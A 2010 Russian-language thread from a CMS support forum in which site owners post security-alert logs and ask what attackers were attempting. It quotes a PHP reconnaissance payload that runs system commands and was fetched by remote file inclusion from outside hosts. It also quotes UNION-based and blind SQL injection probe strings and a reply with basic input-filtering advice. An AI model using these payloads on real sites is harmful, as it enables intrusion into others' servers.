AntiSlaed CMS
Вход
Логин: Пароль:Забыли пароль?
Запомнить вас на этом компьютере?
Войти скрытым?

Здравствуйте, Гость ( Вход | Регистрация )

> Внимание!

Адрес нашего форума изменился, теперь мы доступны по адресу antislaed.net. Обновите ссылки и закладки, он больше не изменится.


 
Ответить в данную темуНачать новую тему
> Кто подскажет что пытались сделать с сайтом?, (+)
xpx
сообщение Feb 4 2010, 09:14
Сообщение #1


Приблуда
Иконка группы

Группа: Пользователи

Сообщений: 29
Регистрация:
25.10.2007
Пользователь №: 1,325
Спасибо сказали: 0

Вставить ник




СегоднЯ обнаружил 10 писем в почтовом Ящике с сообщением о безопасности.
ЦИТАТА
Безопасность

Запрещенное действие: URL in GET - path = http://test.bigshop.cz/uploaded/injek.txt??
IP Адрес: 209.151.70.1
Пользователь: Guest
Ссылка: //?path=http://test.bigshop.cz/uploaded/injek.txt??
Браузер: libwww-perl/5.833
Дата размещения: 03.02.2010 - 08:45:5


Просмотрев что находитьсЯ по этому адресу увидел код, кто разбираетсЯ, что с помощью этого кода хотели сделать! Кстати показал другу этот адресок, когда он его открыл, у него нод32 сработал и показал Прикрепленный файл  image001.png ( 7.67 Кб ) Кол-во загрузок: 35
, мой же NOD32 с сегодняшними обновлениЯми не реагирует.
Вот код длЯ разбора полётов. Отписываем что с помощью него можно и что хотели сделать?
КОД
<?php
//eten Response
$pwd1 =   @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 =   @getenv("SERVER_SOFTWARE");
$php1 =   @phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1=   @diskfreespace($pwd1);
$all1= disk_total_space($pwd1);
$used =   ConvertBytes($all1-$free1);
$free =   ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}

echo "eten".$sf."<br>";
echo "uname -a:   $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software:   $sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";

function ConvertBytes($number) {
  $len = strlen($number);
  if($len < 4) { return sprintf("%d b", $number); }
  if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
  if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
  return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

function ex($cfe) {
  $res = '';
  if (!empty($cfe)) {
    if(function_exists('exec')) {
      @exec($cfe,$res);
      $res = join("\n",$res);
    } elseif(function_exists('shell_exec')) {
      $res = @shell_exec($cfe);
    } elseif(function_exists('system')) {
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(function_exists('passthru')) {
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(@is_resource($f = @popen($cfe,"r"))) {
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    } else { $res = "NULL"; }
  }
  return $res;
}

exit;
?>
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
vitalik1972
сообщение Feb 4 2010, 11:08
Сообщение #2


Живу на АС
Иконка группы

Группа: Пользователи

Сообщений: 765
Регистрация:
10.6.2008
Из: Оренбург
Пользователь №: 4,176
Спасибо сказали: 211

Вставить ник




Успокойся, ничего страшного. Просто пытались выяснить сведения о твоей системе.
Но конечно на основе этих данных можно планировать дальнейшую атаку на твой сервер.
Тоесть например исполнение команды id в ОС типа linux даст вот такой вывод:
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
в том случае если вебсервер (apache например) у тебя запущен от имена root
а это уже серьезный прокол в защите системы

Сообщение отредактировал vitalik1972: Feb 4 2010, 11:11
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
xpx
сообщение Feb 4 2010, 11:16
Сообщение #3


Приблуда
Иконка группы

Группа: Пользователи

Сообщений: 29
Регистрация:
25.10.2007
Пользователь №: 1,325
Спасибо сказали: 0

Вставить ник




Спасиб за ответ! Думаю что у хостера смышлённые казачки работают, и не будут запускать вебсервер от имени root.
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
rusbanka
сообщение Feb 9 2010, 06:09
Сообщение #4


Живу на АС
Иконка группы

Группа: Пользователи

Сообщений: 252
Регистрация:
23.1.2009
Из: Россия
Пользователь №: 7,096
Спасибо сказали: 7

Вставить ник




ЦИТАТА(xpx @ Feb 4 2010, 10:14 ) *
СегоднЯ обнаружил 10 писем в почтовом Ящике с сообщением о безопасности.
Просмотрев что находитьсЯ по этому адресу увидел код, кто разбираетсЯ, что с помощью этого кода хотели сделать! Кстати показал другу этот адресок, когда он его открыл, у него нод32 сработал и показал Прикрепленный файл  image001.png ( 7.67 Кб ) Кол-во загрузок: 35
, мой же NOD32 с сегодняшними обновлениЯми не реагирует.
Вот код длЯ разбора полётов. Отписываем что с помощью него можно и что хотели сделать?

Млин, очередной раз повторяю, не храните пароли в файловых менеджерах !!! Раз код туда попал - значит трояном увели пароль. Храните его в голове !!! Трояны постоянно совершенствуются.
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
xpx
сообщение Feb 9 2010, 06:18
Сообщение #5


Приблуда
Иконка группы

Группа: Пользователи

Сообщений: 29
Регистрация:
25.10.2007
Пользователь №: 1,325
Спасибо сказали: 0

Вставить ник




Все пароли храню и так в голове, из файловых менеджеров сразу удаляю. Сам код на мой хост не попал, он запускался со стороннего сайта, адрес указан в отчётном письме о безопастности. Последнее времЯ чуть ли не каждый день мне приходЯт сообщениЯ о безопастности. Напиример сегоднЯ тоже пришло, по ходу обращались с другова сайта, код немного другой, но действиЯ те же. Поэтому как только приходит сообщение о безопастности, зразу баню по IP.
ЦИТАТА
Безопасность

Запрещенное действие: URL in GET - rootdir = http://scan.ucoz.net/id1.txt?
IP Адрес: 121.88.4.141
Пользователь: Guest
Ссылка: /index.php//surveys/classes/core/language.php?rootdir=http://scan.ucoz.net/id1.txt?
Браузер: Mozilla/5.0
Дата размещения: 08.02.2010 - 23:27:54
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
DjSalamander
сообщение Feb 12 2010, 23:45
Сообщение #6


прорвемся...
Иконка группы

Группа: [..AS..]

Сообщений: 2,388
Регистрация:
6.9.2008
Из: Latvia Riga-Vangaži
Пользователь №: 5,367
Спасибо сказали: 457

Вставить ник




дык привыкай не тебе одному разную хрень пытаются всадить мне тоже уже ни раз пытались вот хотя бы это:

/nav.php?go=http://www.gzzsyy.com.cn/brd/id1.txt?? = zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>


вот закинь подчеркнутое в гугл там ответов валом будет.
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
xpx
сообщение Feb 13 2010, 06:10
Сообщение #7


Приблуда
Иконка группы

Группа: Пользователи

Сообщений: 29
Регистрация:
25.10.2007
Пользователь №: 1,325
Спасибо сказали: 0

Вставить ник




и такое почти каждый день приходит. Надеюсь это не повредит сайту?
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
DjSalamander
сообщение Feb 13 2010, 13:35
Сообщение #8


прорвемся...
Иконка группы

Группа: [..AS..]

Сообщений: 2,388
Регистрация:
6.9.2008
Из: Latvia Riga-Vangaži
Пользователь №: 5,367
Спасибо сказали: 457

Вставить ник




ЦИТАТА(xpx @ Сегодня, 04:10 )
и такое почти каждый день приходит. Надеюсь это не повредит сайту?


если всадят SQL инекцию, то конечно повредит
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
xpx
сообщение Feb 16 2010, 10:46
Сообщение #9


Приблуда
Иконка группы

Группа: Пользователи

Сообщений: 29
Регистрация:
25.10.2007
Пользователь №: 1,325
Спасибо сказали: 0

Вставить ник




Это возможно? Вообще как делают SQL инекцию? Много слышал об этом но не знаю как это делаетсЯ и соответственно не знаю как от этого защищаться?
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
DjSalamander
сообщение Mar 28 2010, 07:55
Сообщение #10


прорвемся...
Иконка группы

Группа: [..AS..]

Сообщений: 2,388
Регистрация:
6.9.2008
Из: Latvia Riga-Vangaži
Пользователь №: 5,367
Спасибо сказали: 457

Вставить ник




такую дрянь в первые встечаю, в гугле толкового ответа не нашел, кто зае, что это за дерьмо?-

Попытка взлома: XSS in GET - cat = 44 and 1=0 Union Select 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E69
IP Адрес: 78.84.241.85
Пользователь: Guest
Ссылка: /index.php?name=news&cat=44 and 1=0 Union Select 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878
,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,
0x787878756E696F6E787878--
Браузер: unknown
Дата размещения: 27.03.2010 - 13:49:03
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
vitalik1972
сообщение Mar 28 2010, 18:11
Сообщение #11


Живу на АС
Иконка группы

Группа: Пользователи

Сообщений: 765
Регистрация:
10.6.2008
Из: Оренбург
Пользователь №: 4,176
Спасибо сказали: 211

Вставить ник




переполнение буфера GET пытались сделать. ас его нормально воспринимает.
vitalik1972, Вас 1 раз(а) поблагодарили за это сообщение:
DjSalamander
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
darkflasher
сообщение Mar 29 2010, 12:52
Сообщение #12


Приблуда
Иконка группы

Группа: Пользователи

Сообщений: 11
Регистрация:
3.4.2009
Пользователь №: 7,941
Спасибо сказали: 5

Вставить ник




ЦИТАТА(xpx @ Feb 16 2010, 10:46 ) *
Это возможно? Вообще как делают SQL инекцию? Много слышал об этом но не знаю как это делаетсЯ и соответственно не знаю как от этого защищаться?

Через передачу в качестве параметра SQL-запроса или скрипта. Защититься на самом деле несложно: нужно проверять передаваемые данные. Бороться с одинарными и двойными кавычками, ограничивать длину передаваемых параметров, блокировать запросы со словами script, UNION и т.д.

Если передаваться в качестве параметра должно число, то intval() тебе в помощь, если текст, то text_filter(). Эти функции серьезно портят жизнь любителям инъекций..
darkflasher, Вас 1 раз(а) поблагодарили за это сообщение:
DjSalamander
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
DjSalamander
сообщение Mar 29 2010, 13:07
Сообщение #13


прорвемся...
Иконка группы

Группа: [..AS..]

Сообщений: 2,388
Регистрация:
6.9.2008
Из: Latvia Riga-Vangaži
Пользователь №: 5,367
Спасибо сказали: 457

Вставить ник




ЦИТАТА(darkflasher @ Сегодня, 11:52 )
Если передаваться в качестве параметра должно число, то intval() тебе в помощь, если текст, то text_filter(). Эти функции серьезно портят жизнь любителям инъекций..


нисочти за назойливость, но тут много новичков, так что изложи поподробней, а то не поймут что и кудавсавлять надо (IMG:http://antislaed.net/style_emoticons/default/smile.gif)
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
darkflasher
сообщение Mar 29 2010, 13:42
Сообщение #14


Приблуда
Иконка группы

Группа: Пользователи

Сообщений: 11
Регистрация:
3.4.2009
Пользователь №: 7,941
Спасибо сказали: 5

Вставить ник




ЦИТАТА(DjSalamander @ Mar 29 2010, 13:07 ) *
нисочти за назойливость, но тут много новичков, так что изложи поподробней, а то не поймут что и кудавсавлять надо (IMG:http://antislaed.net/style_emoticons/default/smile.gif)


Например, есть у нас модуль test, который должен принять два параметра, первый - num (число), второй - txt (текст), которые в этом модуле обрабатываются

Итак, ссылка, которая наверняка заинтересует взломщика, примерно выглядит так: http://your_site.ru/index.php?name=test&am...10&txt=sort
Объясняю смысл ссылки: передать сайту в модуль test два параметра методом GET: num=10 и txt="sort"

Будь я на месте взломщика, я бы вместо sort написал плохие вещи и посмотрел, как сайт такое примет)))

Поэтому перед тем, как использовать эти параметры, обезопасим себя:

КОД
if (!defined("MODULE_FILE")) {
    Header("Location: ../../index.php"); //стандартно.. нет модуля - на главную..
    exit;
}

function view() {
    global $db, $prefix, $conf;
    $num= intval($_GET['num']);    //приводим num к числовому формату, вдруг вместо числа пытаются передать текст
        $txt= text_filter($_GET['txt']);   //проверяем текст встроенной функцией AS, которая борется с кавычками, срезает теги и фильтрует слова (их указываем в конфигурации сайта)
    $txt=substr($txt,0,25); // допустим мы знаем, что параметр txt по идее не должен превышать 25 символов в длину, режем все лишнее - если в параметре передается скрипт, то он останется без концовки, что его сразу обезвредит
        if ((!$num) || (!$txt)) {
            Header("Location: /index.php"); //что-то нечисто, выкидываем пользователя на главную..
        } else {
            $result = $db->sql_query("SELECT fulltxt_blablabla FROM ".$prefix."_blablabla WHERE id_blablabla = '$num' AND txt_blablabla LIKE '%$txt%'");
        if ($db->sql_numrows($result) == 1) { //перестраховываемся, проверяем, действительно ли выборка успешна, возможно злоумышленник прощупывает базу в надежде найти лазейку
        list($fulltxt_blablabla) = $db->sql_fetchrow($result);
        head();
        open();
            echo $fulltxt_blablabla; //вроде все в порядке, выводим..
        close();
        foot();
        } else {
                Header("Location: /index.php"); //что-то нечисто, выкидываем пользователя на главную..
            }
        }
}


switch($op) {
    default:
    view();
    break;
}
darkflasher, Вас 1 раз(а) поблагодарили за это сообщение:
DjSalamander
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение
DjSalamander
сообщение Jun 17 2010, 21:48
Сообщение #15


прорвемся...
Иконка группы

Группа: [..AS..]

Сообщений: 2,388
Регистрация:
6.9.2008
Из: Latvia Riga-Vangaži
Пользователь №: 5,367
Спасибо сказали: 457

Вставить ник




млин, как меня такая дрянь достала это пипец, и ето 3я часть того что этот мудила там ковырял

КОД
Попытка взлома: Hack in GET - id = 1430\'`([{^~
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430'`([{^~
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:40

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430'`([{^~
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:40
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430\' aND \'8\'=\'8
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:43

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:43
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430\' aND \'8\'=\'3
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:43

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:43
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430\'    aND    \'8\'=\'8
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430'    aND    '8'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:46

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430'    aND    '8'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:46
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430\'    aND    \'8\'=\'3
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430'    aND    '8'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:46

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430'    aND    '8'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:46
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430/**/aND/**/8=8
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:47

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:47
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430/**/aND/**/8=3
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:48

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:48
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430\'/**/aND/**/\'8\'=\'8
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:48

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:48
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430\'/**/aND/**/\'8\'=\'3
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:49

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:49
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430%\' aND \'8%\'=\'8
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:49

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:49
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430%\' aND \'8%\'=\'3
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:50

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:50
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430%\'    aND    \'8\'=\'8
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%'    aND    '8'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:51

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%'    aND    '8'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:51
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430%\'    aND    \'8%\'=\'3
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%'    aND    '8%'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:52

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%'    aND    '8%'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:52
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430%\'/**/aND/**/\'8\'=\'8
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:52

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8'='8
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:52
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430%\'/**/aND/**/\'8%\'=\'3
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8%'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:53

IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8%'='3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Дата размещения: 17.06.2010 - 09:26:53
---
Попытка взлома: madcat.lv -be one of us...   - Безопасность

Попытка взлома: Hack in GET - id = 1430/**/XoR/**/8=3
IP Адрес: 123.11.65.137
Пользователь: Guest
Ссылка: /index.php?name=news&op=printe&id=1430/**/XoR/**/8=3
Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
